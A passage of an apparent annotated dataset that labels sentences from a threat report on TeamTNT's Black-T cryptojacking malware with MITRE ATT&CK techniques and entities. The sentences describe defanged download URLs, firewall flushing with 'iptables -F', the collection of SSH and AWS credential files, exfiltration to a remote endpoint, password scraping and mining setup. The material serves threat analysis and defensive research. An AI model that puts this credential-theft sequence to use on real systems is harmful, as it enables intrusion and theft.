"page_number": 1, "sentence_id": 16, "context_before": "Prisma Cloud\ncan assist in securing cloud deployments against the threats posed by TeamTNT, by guiding organizations to better detect vulnerabilities or misconfigurations in cloud environment settings and infrastructure as code (IaC) templates prior to deploying production systems.", "sentence_text": "Additionally, by installing the latest apps and threat definitions on Palo Alto Networks Next-Generation Firewall , network connections to known XMR public mining pools, or to malicious domains and IPs, can be prevented before the environment is compromised.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s17-6575fb", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 17, "context_before": "Additionally, by installing the latest apps and threat definitions on Palo Alto Networks Next-Generation Firewall , network connections to known XMR public mining pools, or to malicious domains and IPs, can be prevented before the environment is compromised.", "sentence_text": "Black-T Dissection\nThe Black-T script is downloaded from the TeamTNT domain, hxxps://teamtnt[.]red/BLACK-T/SetUpTheBLACK-T , to the compromised cloud system that maintained an exposed Docker daemon API.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Downloaded Black-T script from TeamTNT domain to compromised cloud system", "entities": [ { "text": "TeamTNT ", "start": 61, "end": 69, "label": "ThreatActor" }, { "text": "Black-T ", "start": 0, "end": 8, "label": "MalwareTool" }, { "text": "Black-T", "start": 23, "end": 30, "label": "MalwareTool" }, { "text": "hxxps://teamtnt[.]red/BLACK-T/SetUpTheBLACK-T", "start": 77, "end": 122, "label": "Infrastructure_Indicator" }, { "text": "exposed Docker daemon API", "start": 176, "end": 201, "label": "Infrastructure_Indicator" }, { "text": "downloaded ", "start": 41, "end": 52, "label": "Action" } ] }, { "uid": "mitre-76_mitre_report-p1-s18-4de968", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 18, "context_before": "Black-T Dissection\nThe Black-T script is downloaded from the TeamTNT domain, hxxps://teamtnt[.]red/BLACK-T/SetUpTheBLACK-T , to the compromised cloud system that maintained an exposed Docker daemon API.", "sentence_text": "Once downloaded to the compromised system, the script will perform the following actions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s19-ebdc6a", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 19, "context_before": "Once downloaded to the compromised system, the script will perform the following actions.", "sentence_text": "First, there is a display of an ASCII art banner declaring that this variant is version 1 (see Figure 1).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s20-d4069f", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 20, "context_before": "First, there is a display of an ASCII art banner declaring that this variant is version 1 (see Figure 1).", "sentence_text": "Then, the script performs a clean and system prep operation, in which the script will remove known cryptojacking malware already in place on the compromised system.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070", "name": "Indicator Removal" } ], "procedure": "Removes existing cryptojacking malware from compromised system", "entities": [ { "text": "cryptojacking malware", "start": 99, "end": 120, "label": "MalwareTool" }, { "text": "remove ", "start": 86, "end": 93, "label": "Action" } ] }, { "uid": "mitre-76_mitre_report-p1-s21-055251", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 21, "context_before": "Then, the script performs a clean and system prep operation, in which the script will remove known cryptojacking malware already in place on the compromised system.", "sentence_text": "Black-T specifically targets Kinsing malware, a competing cryptojacking process family.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": null, "procedure": "Target competing Kinsing cryptojacking malware as part of a cleanup and system preparation operation.", "entities": [ { "text": "Black-T", "start": 0, "end": 7, "label": "MalwareTool" }, { "text": "targets Kinsing malware", "start": 21, "end": 44, "label": "Action" }, { "text": "Kinsing malware", "start": 29, "end": 44, "label": "MalwareTool" } ] }, { "uid": "mitre-76_mitre_report-p1-s22-6ae1a4", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 22, "context_before": "Black-T specifically targets Kinsing malware, a competing cryptojacking process family.", "sentence_text": "With the inclusion of these potential cryptojacking processes found within the Black-T malware, it would appear that these cryptojacking processes are known to the TeamTNT authors as competing for cloud processing resources.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s23-aebcc0", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 23, "context_before": "With the inclusion of these potential cryptojacking processes found within the Black-T malware, it would appear that these cryptojacking processes are known to the TeamTNT authors as competing for cloud processing resources.", "sentence_text": "This would also indicate there are several cryptojacking processes currently unknown to defense teams and efforts should be taken to identify and build mitigation rules for these currently unknown cryptojacking processes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s24-a8f1be", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 24, "context_before": "This would also indicate there are several cryptojacking processes currently unknown to defense teams and efforts should be taken to identify and build mitigation rules for these currently unknown cryptojacking processes.", "sentence_text": "There is an XMR public mining pool called cruxpool[.]com.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s25-4e4057", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 25, "context_before": "There is an XMR public mining pool called cruxpool[.]com.", "sentence_text": "Following the cleaning of any known cryptojacking processes, the Black-T malware will also perform a cleaning operation for any known xmrig process currently running on the compromised system.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": null, "procedure": "Black-T malware removes competing cryptomining processes such as xmrig from the compromised system.", "entities": [ { "text": "Black-T malware", "start": 65, "end": 80, "label": "MalwareTool" }, { "text": "perform a cleaning operation for any known xmrig process", "start": 91, "end": 147, "label": "Action" }, { "text": "xmrig process", "start": 134, "end": 147, "label": "MalwareTool" } ] }, { "uid": "mitre-76_mitre_report-p1-s26-69567c", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 26, "context_before": "Following the cleaning of any known cryptojacking processes, the Black-T malware will also perform a cleaning operation for any known xmrig process currently running on the compromised system.", "sentence_text": "XMRig is a popular open-source process, which facilitates the computational operations needed to mine the XMR cryptocurrency.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s27-9d9af3", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 27, "context_before": "XMRig is a popular open-source process, which facilitates the computational operations needed to mine the XMR cryptocurrency.", "sentence_text": "Of note, TeamTNT makes use of customized processes within their scripts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s28-de3836", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 28, "context_before": "Of note, TeamTNT makes use of customized processes within their scripts.", "sentence_text": "These custom processes represent traditional *NIX processes, but have the prefix “tnt” added to the process name.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Uses custom processes with \"tnt\" prefix", "entities": [ { "text": "tnt", "start": 82, "end": 85, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-76_mitre_report-p1-s29-15a25f", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 29, "context_before": "These custom processes represent traditional *NIX processes, but have the prefix “tnt” added to the process name.", "sentence_text": "For example, tntrecht is a customized process that is loaded into /usr/local/bin/tntrecht on the compromised system and is likely used to hijack and modify the permissions of legitimate *NIX processes to be used for TeamTNT operations.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1548", "name": "Abuse Elevation Control Mechanism" }, { "id": "T1036", "name": "Masquerading" } ], "procedure": "Hijacks and modifies permissions of legitimate processes", "entities": [ { "text": "TeamTNT ", "start": 216, "end": 224, "label": "ThreatActor" }, { "text": "tntrecht ", "start": 13, "end": 22, "label": "MalwareTool" }, { "text": "/usr/local/bin/tntrecht", "start": 66, "end": 89, "label": "Infrastructure_Indicator" }, { "text": "hijack ", "start": 138, "end": 145, "label": "Action" }, { "text": "modify ", "start": 149, "end": 156, "label": "Action" } ] }, { "uid": "mitre-76_mitre_report-p1-s30-fc653c", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 30, "context_before": "For example, tntrecht is a customized process that is loaded into /usr/local/bin/tntrecht on the compromised system and is likely used to hijack and modify the permissions of legitimate *NIX processes to be used for TeamTNT operations.", "sentence_text": "The modified legitimate processes are subsequently renamed with the “tnt” prefix – for instance, tntwget and tntcurl System Setup", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Renames legitimate processes with \"tnt\" prefix", "entities": [ { "text": "tntcurl ", "start": 109, "end": 117, "label": "MalwareTool" }, { "text": "tntwget ", "start": 97, "end": 105, "label": "MalwareTool" }, { "text": "renamed ", "start": 51, "end": 59, "label": "Action" } ] }, { "uid": "mitre-76_mitre_report-p1-s31-939ce3", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 31, "context_before": "The modified legitimate processes are subsequently renamed with the “tnt” prefix – for instance, tntwget and tntcurl System Setup", "sentence_text": "Following the cleanup of the compromised system, the script will further set up the system environment by setting Path Variables:\nPATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin\n, naming\n8.8.4.4\nand\n8.8.8.8\nas new DNS servers, and finally, flushing all established IP table rules using the command iptables -F", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562", "name": "Impair Defenses" } ], "procedure": "Sets PATH variables, configures DNS servers, and flushes iptables rules", "entities": [ { "text": "8.8.4.4", "start": 189, "end": 196, "label": "Infrastructure_Indicator" }, { "text": "8.8.8.8", "start": 201, "end": 208, "label": "Infrastructure_Indicator" }, { "text": "flushing ", "start": 242, "end": 251, "label": "Action" }, { "text": "setting ", "start": 106, "end": 114, "label": "Action" }, { "text": "naming", "start": 182, "end": 188, "label": "Action" } ] }, { "uid": "mitre-76_mitre_report-p1-s32-070c71", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 32, "context_before": "Following the cleanup of the compromised system, the script will further set up the system environment by setting Path Variables:\nPATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin\n, naming\n8.8.4.4\nand\n8.8.8.8\nas new DNS servers, and finally, flushing all established IP table rules using the command iptables -F", "sentence_text": "The script will then check to see which *NIX package manager is installed on the compromised system: Advanced Package Tool ( APT ), Yellowdog Updater, Modified ( YUM ) or Alpine Linux package manager ( APK ).", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1518", "name": "Software Discovery" } ], "procedure": "Checks for installed package manager on compromised system", "entities": [ { "text": "YUM ", "start": 162, "end": 166, "label": "Infrastructure_Indicator" }, { "text": "APT ", "start": 125, "end": 129, "label": "Infrastructure_Indicator" }, { "text": "APK ", "start": 202, "end": 206, "label": "Infrastructure_Indicator" }, { "text": "check ", "start": 21, "end": 27, "label": "Action" } ] }, { "uid": "mitre-76_mitre_report-p1-s33-9ccda4", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 33, "context_before": "The script will then check to see which *NIX package manager is installed on the compromised system: Advanced Package Tool ( APT ), Yellowdog Updater, Modified ( YUM ) or Alpine Linux package manager ( APK ).", "sentence_text": "See the setup image in Figure 4.\nzmap\n.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s34-2a6709", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 34, "context_before": "See the setup image in Figure 4.\nzmap\n.", "sentence_text": "The Black-T variant downloads two files, which execute directly into bash:\nhxxps://teamtnt[.]red/BLACK-T/beta and hxxps://teamtnt[.]red/BLACK-T/setup/bd", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Downloads and executes files directly into bash", "entities": [ { "text": "Black-T ", "start": 4, "end": 12, "label": "MalwareTool" }, { "text": "hxxps://teamtnt[.]red/BLACK-T/beta", "start": 75, "end": 109, "label": "Infrastructure_Indicator" }, { "text": "hxxps://teamtnt[.]red/BLACK-T/setup/bd", "start": 114, "end": 152, "label": "Infrastructure_Indicator" }, { "text": "downloads ", "start": 20, "end": 30, "label": "Action" }, { "text": "execute ", "start": 47, "end": 55, "label": "Action" } ] }, { "uid": "mitre-76_mitre_report-p1-s35-9e989a", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 35, "context_before": "The Black-T variant downloads two files, which execute directly into bash:\nhxxps://teamtnt[.]red/BLACK-T/beta and hxxps://teamtnt[.]red/BLACK-T/setup/bd", "sentence_text": "Beta Beta is used to make a new directory /.../ where the following files are compressed into two tar files named root.tar.gz:\n/root/.bash_history\n/root/.ssh/\n/etc/hosts\n/root/.docker/\n/root/.aws/\n/root/*.sh\n/home/*/.bash_history\n/home/*/.ssh/", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" }, { "id": "T1560", "name": "Archive Collected Data" } ], "procedure": "Compresses system files and directories into tar archives", "entities": [ { "text": "Beta ", "start": 0, "end": 5, "label": "MalwareTool" }, { "text": "Beta ", "start": 5, "end": 10, "label": "MalwareTool" }, { "text": "root.tar.gz", "start": 114, "end": 125, "label": "Infrastructure_Indicator" }, { "text": "/root/.bash_history", "start": 127, "end": 146, "label": "Infrastructure_Indicator" }, { "text": "/root/.ssh/", "start": 147, "end": 158, "label": "Infrastructure_Indicator" }, { "text": "/etc/hosts", "start": 159, "end": 169, "label": "Infrastructure_Indicator" }, { "text": "/root/.docker/", "start": 170, "end": 184, "label": "Infrastructure_Indicator" }, { "text": "/root/.aws/", "start": 185, "end": 196, "label": "Infrastructure_Indicator" }, { "text": "/root/*.sh", "start": 197, "end": 207, "label": "Infrastructure_Indicator" }, { "text": "/home/*/.bash_history", "start": 208, "end": 229, "label": "Infrastructure_Indicator" }, { "text": "/home/*/.ssh/", "start": 230, "end": 243, "label": "Infrastructure_Indicator" }, { "text": "compressed ", "start": 78, "end": 89, "label": "Action" }, { "text": "make a new directory", "start": 21, "end": 41, "label": "Action" } ] }, { "uid": "mitre-76_mitre_report-p1-s36-045e5c", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 36, "context_before": "Beta Beta is used to make a new directory /.../ where the following files are compressed into two tar files named root.tar.gz:\n/root/.bash_history\n/root/.ssh/\n/etc/hosts\n/root/.docker/\n/root/.aws/\n/root/*.sh\n/home/*/.bash_history\n/home/*/.ssh/", "sentence_text": "/home/*/*.sh", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s37-b5bc35", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 37, "context_before": "/home/*/*.sh", "sentence_text": "And, cron.tar.gz:\n/etc/cron*/\n/var/spool/cron/\nThese two files, upon compression, are then sent to the URL hxxps://teamtnt[.]red/only_for_stats/dup.php .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s38-16349b", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 38, "context_before": "And, cron.tar.gz:\n/etc/cron*/\n/var/spool/cron/\nThese two files, upon compression, are then sent to the URL hxxps://teamtnt[.]red/only_for_stats/dup.php .", "sentence_text": "It is important to note that TeamTNT actors are still targeting AWS credential and configuration files located on compromised AWS cloud systems.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1552.001", "name": "Credentials In Files" } ], "procedure": "Targets AWS credential and configuration files on compromised cloud systems", "entities": [ { "text": "TeamTNT ", "start": 29, "end": 37, "label": "ThreatActor" }, { "text": "AWS credential", "start": 64, "end": 78, "label": "Infrastructure_Indicator" }, { "text": "AWS cloud systems", "start": 126, "end": 143, "label": "Infrastructure_Indicator" }, { "text": "configuration files", "start": 83, "end": 102, "label": "Infrastructure_Indicator" }, { "text": "targeting ", "start": 54, "end": 64, "label": "Action" } ] }, { "uid": "mitre-76_mitre_report-p1-s39-ffe65e", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 39, "context_before": "It is important to note that TeamTNT actors are still targeting AWS credential and configuration files located on compromised AWS cloud systems.", "sentence_text": "If compromised systems do contain AWS credentials, the TeamTNT actors could attempt to use these AWS credentials to expand their cryptojacking operations within the compromised system’s AWS environment.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" }, { "id": "T1496", "name": "Resource Hijacking" } ], "procedure": "Uses compromised AWS credentials to expand cryptojacking operations", "entities": [ { "text": "TeamTNT ", "start": 55, "end": 63, "label": "ThreatActor" }, { "text": "AWS credentials", "start": 34, "end": 49, "label": "Infrastructure_Indicator" }, { "text": "AWS environment", "start": 186, "end": 201, "label": "Infrastructure_Indicator" }, { "text": "AWS credentials", "start": 97, "end": 112, "label": "Infrastructure_Indicator" }, { "text": "use ", "start": 87, "end": 91, "label": "Action" }, { "text": "expand ", "start": 116, "end": 123, "label": "Action" } ] }, { "uid": "mitre-76_mitre_report-p1-s40-ecf133", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 40, "context_before": "If compromised systems do contain AWS credentials, the TeamTNT actors could attempt to use these AWS credentials to expand their cryptojacking operations within the compromised system’s AWS environment.", "sentence_text": "By using the AWS credentials obtained from the exposed and compromised Docker daemon system, TeamTNT actors could use this system as a pivot point to gain access to additional cloud systems and resources that use the same AWS credentials and which are hosted within the system’s larger AWS environment.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Uses AWS credentials to pivot and gain access to additional cloud systems", "entities": [ { "text": "TeamTNT ", "start": 93, "end": 101, "label": "ThreatActor" }, { "text": "gain access", "start": 150, "end": 161, "label": "Action" }, { "text": "use ", "start": 114, "end": 118, "label": "Action" }, { "text": "AWS credentials", "start": 13, "end": 28, "label": "Infrastructure_Indicator" }, { "text": "AWS credentials", "start": 222, "end": 237, "label": "Infrastructure_Indicator" }, { "text": "AWS environment", "start": 286, "end": 301, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-76_mitre_report-p1-s41-d3b5b0", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 41, "context_before": "By using the AWS credentials obtained from the exposed and compromised Docker daemon system, TeamTNT actors could use this system as a pivot point to gain access to additional cloud systems and resources that use the same AWS credentials and which are hosted within the system’s larger AWS environment.", "sentence_text": "Finally, the\nbeta\nscript will set the service token for monitoring XMR mining operations.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1496", "name": "Resource Hijacking" } ], "procedure": "Sets service token for monitoring XMR mining operations", "entities": [ { "text": "beta", "start": 13, "end": 17, "label": "MalwareTool" }, { "text": "service token", "start": 38, "end": 51, "label": "Infrastructure_Indicator" }, { "text": "set ", "start": 30, "end": 34, "label": "Action" } ] }, { "uid": "mitre-76_mitre_report-p1-s42-198582", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 42, "context_before": "Finally, the\nbeta\nscript will set the service token for monitoring XMR mining operations.", "sentence_text": "This is likely done as a means of redundancy to provide actors with different types of operations to launch following the exploitation of a system.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s43-070832", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 43, "context_before": "This is likely done as a means of redundancy to provide actors with different types of operations to launch following the exploitation of a system.", "sentence_text": "pw\nThe script pw is very intriguing, as it performs post-exploitation operations of password scraping using mimipy and mimipenquin , which are *NIX tools adapted for use from the Windows tool Mimikatz .", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1003", "name": "OS Credential Dumping" } ], "procedure": "Performs password scraping using mimipy and mimipenquin", "entities": [ { "text": "mimipy ", "start": 108, "end": 115, "label": "MalwareTool" }, { "text": "mimipenquin ", "start": 119, "end": 131, "label": "MalwareTool" }, { "text": "password scraping", "start": 84, "end": 101, "label": "Action" } ] }, { "uid": "mitre-76_mitre_report-p1-s44-ca5c45", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 44, "context_before": "pw\nThe script pw is very intriguing, as it performs post-exploitation operations of password scraping using mimipy and mimipenquin , which are *NIX tools adapted for use from the Windows tool Mimikatz .", "sentence_text": "Upon uncovering any passwords residing in memory within the compromised system, the passwords are written to the file /var/tmp/.../output.txt , which is then uploaded to hxxps://teamtnt[.]red/only_for_stats/dup.php .", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Writes passwords to file and uploads to TeamTNT server", "entities": [ { "text": "hxxps://teamtnt[.]red/only_for_stats/dup.php", "start": 170, "end": 214, "label": "Infrastructure_Indicator" }, { "text": "/var/tmp/.../output.txt", "start": 118, "end": 141, "label": "Infrastructure_Indicator" }, { "text": "written ", "start": 98, "end": 106, "label": "Action" }, { "text": "uploaded ", "start": 158, "end": 167, "label": "Action" } ] }, { "uid": "mitre-76_mitre_report-p1-s46-dcbb3d", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 46, "context_before": "See Figure 5.", "sentence_text": "bd\nThe script bd is used to download the XMR mining software relevant to the given compromised system.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Downloads XMR mining software", "entities": [ { "text": "bd", "start": 0, "end": 2, "label": "MalwareTool" }, { "text": "bd ", "start": 14, "end": 17, "label": "MalwareTool" }, { "text": "XMR mining software", "start": 41, "end": 60, "label": "Infrastructure_Indicator" }, { "text": "download ", "start": 28, "end": 37, "label": "Action" } ] }, { "uid": "mitre-76_mitre_report-p1-s47-dbc8cb", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 47, "context_before": "bd\nThe script bd is used to download the XMR mining software relevant to the given compromised system.", "sentence_text": "These downloaded files and the SHA256 values for the mining software have been reported on before during an operation targeting Weave Scope deployments previously reported (see Table 1).", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Downloads files and mining software with known SHA256 values", "entities": [ { "text": "downloaded ", "start": 6, "end": 17, "label": "Action" }, { "text": "SHA256 values ", "start": 31, "end": 45, "label": "Infrastructure_Indicator" }, { "text": "Weave Scope deployments", "start": 128, "end": 151, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-76_mitre_report-p1-s48-240507", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 48, "context_before": "These downloaded files and the SHA256 values for the mining software have been reported on before during an operation targeting Weave Scope deployments previously reported (see Table 1).", "sentence_text": "XMR Miner Setup The Black-T script then downloads the known XMR miner software sbin_u , (SHA256:\nfae2f1399282508a4f01579ad617d9db939d0117e3b2fcfcc48ae4bef59540d9\n).", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "downloads the known XMR miner software sbin_u", "entities": [ { "text": "sbin_u", "start": 79, "end": 85, "label": "MalwareTool" }, { "text": "downloads the known XMR miner software sbin_u", "start": 40, "end": 85, "label": "Action" } ] }, { "uid": "mitre-76_mitre_report-p1-s49-09d235", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 49, "context_before": "XMR Miner Setup The Black-T script then downloads the known XMR miner software sbin_u , (SHA256:\nfae2f1399282508a4f01579ad617d9db939d0117e3b2fcfcc48ae4bef59540d9\n).", "sentence_text": "This type of mining software has been linked before to TeamTNT.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s50-30e4cf", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 50, "context_before": "This type of mining software has been linked before to TeamTNT.", "sentence_text": "Finally, Black-T configures the XMR mining software to use the following XMR wallet address:\n84xqqFNopNcG7T5AcVyv7LVyrBfQyTVGxMFEL2gsxQ92eNfu6xddkWabA3yKCJmfdaA9jEiCyFqfffKp1nQkgeq2Uu2dhB8\n.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1496", "name": "Resource Hijacking" } ], "procedure": "Configures XMR mining software with specific wallet address", "entities": [ { "text": "Black-T", "start": 9, "end": 16, "label": "MalwareTool" }, { "text": "84xqqFNopNcG7T5AcVyv7LVyrBfQyTVGxMFEL2gsxQ92eNfu6xddkWabA3yKCJmfdaA9jEiCyFqfffKp1nQkgeq2Uu2dhB8", "start": 93, "end": 188, "label": "Infrastructure_Indicator" }, { "text": "configures ", "start": 17, "end": 28, "label": "Action" } ] }, { "uid": "mitre-76_mitre_report-p1-s51-3c78a2", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 51, "context_before": "Finally, Black-T configures the XMR mining software to use the following XMR wallet address:\n84xqqFNopNcG7T5AcVyv7LVyrBfQyTVGxMFEL2gsxQ92eNfu6xddkWabA3yKCJmfdaA9jEiCyFqfffKp1nQkgeq2Uu2dhB8\n.", "sentence_text": "Worm Functionality\nTeamTNT has long maintained its usage of worm-like techniques and has used masscan or pnscan to discover vulnerable systems.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1046", "name": "Network Service Discovery" } ], "procedure": "Uses masscan or pnscan to discover vulnerable systems", "entities": [ { "text": "TeamTNT ", "start": 19, "end": 27, "label": "ThreatActor" }, { "text": "pnscan ", "start": 105, "end": 112, "label": "MalwareTool" }, { "text": "masscan ", "start": 94, "end": 102, "label": "MalwareTool" }, { "text": "vulnerable systems", "start": 124, "end": 142, "label": "Infrastructure_Indicator" }, { "text": "discover ", "start": 115, "end": 124, "label": "Action" } ] }, { "uid": "mitre-76_mitre_report-p1-s52-cd9c40", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 52, "context_before": "Worm Functionality\nTeamTNT has long maintained its usage of worm-like techniques and has used masscan or pnscan to discover vulnerable systems.", "sentence_text": "Black-T is no exception.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s53-5fd0e9", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 53, "context_before": "Black-T is no exception.", "sentence_text": "While the exact purpose of adding port 5555 to the scanner is unknown, there have been documented cases where XMR cryptojacking is occurring on Android-based devices.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s54-0c95d1", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 54, "context_before": "While the exact purpose of adding port 5555 to the scanner is unknown, there have been documented cases where XMR cryptojacking is occurring on Android-based devices.", "sentence_text": "This could indicate a new unknown target set for expanding TeamTNT cryptojacking operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s55-7b03d4", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 55, "context_before": "This could indicate a new unknown target set for expanding TeamTNT cryptojacking operations.", "sentence_text": "However, there is little evidence to support TeamTNT targeting Android devices.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s56-51b809", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 56, "context_before": "However, there is little evidence to support TeamTNT targeting Android devices.", "sentence_text": "Additionally, Black-T also performs scanning operations on a random CIDR 8 network range as it searches for exposed Docker API instances.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1046", "name": "Network Service Discovery" } ], "procedure": "Performs scanning on random CIDR 8 network range for exposed Docker APIs", "entities": [ { "text": " Black-T", "start": 13, "end": 21, "label": "MalwareTool" }, { "text": "random CIDR 8 network range", "start": 61, "end": 88, "label": "Infrastructure_Indicator" }, { "text": " exposed Docker API instances", "start": 107, "end": 136, "label": "Infrastructure_Indicator" }, { "text": "performs scanning", "start": 27, "end": 44, "label": "Action" } ] }, { "uid": "mitre-76_mitre_report-p1-s57-a2f0c1", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 57, "context_before": "Additionally, Black-T also performs scanning operations on a random CIDR 8 network range as it searches for exposed Docker API instances.", "sentence_text": "This is also a new finding related to TeamTNT TTPs (see Figure 10).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s58-bbab25", "source": "mitre", "doc_id": "76_mitre_report", 